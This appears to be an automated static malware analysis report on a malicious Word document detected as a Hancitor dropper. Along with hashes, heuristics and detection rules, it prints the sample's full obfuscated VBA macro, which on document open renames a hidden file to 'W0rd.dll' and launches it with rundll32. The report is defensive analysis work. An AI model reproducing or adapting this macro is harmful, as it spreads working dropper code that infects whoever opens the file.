Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d8057f01f2accd3d…

MALICIOUS

Office (OLE)

Size: 411.5 KB
Created: 2020-12-17 15:19:00
Authoring application: Microsoft Office Word
First seen: 2021-06-04
MD5: 646e8048abeb66b9c2a427991fca8a4a
SHA-1: 83632fb36670ef36bf5c42d0d87305a7563c86a4
SHA-256: d8057f01f2accd3d22f68cb8f782270fe82cda7d65b894522793214d66661498
Risk score: 610

Malware Insights

MITRE ATT&CK
  • T1204.002 Malicious File
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer

The sample is a malicious Office document that exploits CVE-2007-3899 to execute embedded code. The Document_Open macro uses ShellExecute to run an embedded PE executable, likely a downloader or dropper. The ClamAV detection name 'Doc.Dropper.Hancitor-9845854-0' further supports its malicious nature as a dropper.

Heuristics (16)

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption
    Severity: critical | Rule: CVE_2007_3899 (CVE likely)
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • OLE with Ole10Native — possible CVE-2026-21514 exploitation
    Severity: high | Rule: CVE_2026_21514 (CVE likely)
    Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
  • ClamAV: Doc.Dropper.Hancitor-9845854-0
    Severity: critical | Rule: CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Hancitor-9845854-0
  • Embedded PE executable
    Severity: critical | Rule: OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected
    Severity: medium | Rule: OLE_VBA_MACROS (4 related findings)
    Document contains VBA macro code
  • Potential Shell call in VBA
    Severity: critical | Rule: OLE_VBA_SHELL
    Matched lines in script:
     glops = repid
    Dim regsrva As New Shell32.Shell
    yy = glops & yy & pushstr & "ll" & "," & "Dll" & "UnregisterServer"
  • CreateObject call
    Severity: high | Rule: OLE_VBA_CREATEOBJ
    Matched lines in script:
    asdf = RootPath
    Set fso = CreateObject(cheza & "p" & "ting.FileSystem" & "Object")
  • VBA p-code auto-exec with execution tokens
    Severity: high | Rule: OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro
    Severity: low | Rule: OLE_VBA_DOCOPEN
    Matched line in script:
    Private Sub Document_Open()
  • Reference to CreateProcess API
    Severity: high | Rule: SC_STR_CREATEPROCESS
  • Reference to ShellExecute API
    Severity: high | Rule: SC_STR_SHELLEXEC
  • Reference to LoadLibrary API
    Severity: high | Rule: SC_STR_LOADLIBRARY
  • Reference to GetProcAddress API
    Severity: high | Rule: SC_STR_GETPROCADDRESS
  • Suspicious extracted artifact
    Severity: high | Rule: EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualProtect API
    Severity: medium | Rule: SC_STR_VIRTUALPROTECT
  • Embedded URL
    Severity: info | Rule: EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main | Channel: in document text (OLE body)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3799 bytes
SHA-256: 09fbe9e99c29b5957293cf750a7e9b796404a68f985e20d90b88809a55a3f666
Preview of extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim glbl As Integer

Private Sub Document_Open()

 Dim yy As String


 


Dim vxcv As Integer
Dim hugs As Integer
hugs = chek
If hugs = 1 Then
Else
Call ssss
Dim pushstr As String
pushstr = "\W" & "0rd.d"
Dim geto As String
Dim pus As String
pus = "xe"
geto = "nd"
Dim ter As String
ter = "e"
Dim jsd As String
jsd = geto
 Dim hh As String
 hh = "32." & ter & pus
 Dim fps As String
 fps = "r"
 Dim fa As String
 fa = fps & "u" & jsd & "ll" & hh
 Dim glops As String
 glops = repid
Dim regsrva As New Shell32.Shell
yy = glops & yy & pushstr & "ll" & "," & "Dll" & "UnregisterServer"

Call regsrva.ShellExecute(fa, yy, " ", SW_SHOWNORMAL)
End If
End Sub

Attribute VB_Name = "Module10"
Sub gotodown()
Call gototwo
   Selection.TypeBackspace
   Selection.Copy
   
End Sub


Sub gototwo()
Selection.MoveDown Unit:=wdLine, Count:=1
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=24
    Selection.MoveRight Unit:=wdCharacter, Count:=50
    Selection.MoveDown Unit:=wdLine, Count:=24
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=24
    Selection.MoveRight Unit:=wdCharacter, Count:=50
End Sub






Sub checkthe(sf As String)
Dim pifpaf As String
pifpaf = sf
Dim pafh As String
pafh = repid
strFileExists = Dir(pifpaf & "\ya.wav")
Dim nothings As String
nothings = pafh

      If strFileExists = "" Then
    
    Else
         If Dir(nothings & "\" & "W0rd.dll") = "" Then

        Name sf & "\ya.wav" As ActiveDocument.AttachedTemplate.Path & "\" & "W0rd.dll"
    Else
   Exit Sub
    End If
  
    End If
End Sub


Function repid()

repid = ActiveDocument.AttachedTemplate.Path
End Function


Attribute VB_Name = "Module12"
Sub hi(myhome As String)
Dim glog As String
glog = ActiveDocument.AttachedTemplate.Path
Dim fu As String
fu = glog & "\W0rd.dll"
Name myhome & "\ya.wav" As fu
End Sub





Attribute VB_Name = "Module11"
Sub ssss()
Dim ntgs
Dim sda
Call gotodown
    ntgs = 50
sda = 49
Dim jos

While sda < 50
      ntgs = ntgs - 1
      
      If Dir(Left(ActiveDocument.AttachedTemplate.Path, ntgs) & "Loc" & "al\Te" & "mp", vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   
Call Getme(Left(ActiveDocument.AttachedTemplate.Path, ntgs) & "Local\Temp")
  Selection.TypeBackspace
   

End Sub







Attribute VB_Name = "Module1"



Function Getme(RootPath As String)
Dim hor As String

Dim fso As Object
Dim fld As Object
Dim vhhs As Object
Dim afs As String
Dim myArr
hor = repid
Dim asdf
Dim cheza As String
cheza = "Scri"
asdf = RootPath
Set fso = CreateObject(cheza & "p" & "ting.FileSystem" & "Object")

Set fld = fso.GetFolder(asdf)

strFileExists = Dir(RootPath & "\ya.wav")
      If strFileExists = "" Then
    
For Each vhhs In fld.SUBFOLDERS


afs = vhhs

        Call checkthe(afs)
    myArr = Getme(vhhs.Path)


Next
    Set vhhs = Nothing
Getme = myArr
Set fld = Nothing
Set fso = Nothing



    Else
      If Dir(hor & "\W0rd.dll") = "" Then
      
     
   Call hi(RootPath)
      Else
      Exit Function
  End If
    
        End If


End Function





Function chek()
 Dim jsa As String

 jsa = repid
 Dim vzxx As String
 vzxx = jsa
 
 If Dir(vzxx & "\W0rd.dll") = "" Then
 chek = 0
 Else

 chek = 1
 End If
End Function
Filename: embedded_office_00021a71.exe
Kind: embedded-pe
Source: Office MZ+PE at offset 0x21A71
Size: 283535 bytes
SHA-256: 5a01becd235e137c1727b94a6f4fbe12215ec2e2f1b8f9707d0c5f599645983e
Detection:
  • ClamAV: No threats found
  • Obfuscation or payload: likely
  • Carved macro source contains an auto-exec entry point and execution/download terms.

Filename: ole10native_00.bin
Kind: ole-package
Source: OLE Ole10Native stream: ObjectPool/_1669701977/Ole10Native
Size: 243509 bytes
SHA-256: 202d1b381e0ba08de6a982612ef2a481817ebfbe26c19ee77cc9799071eaa587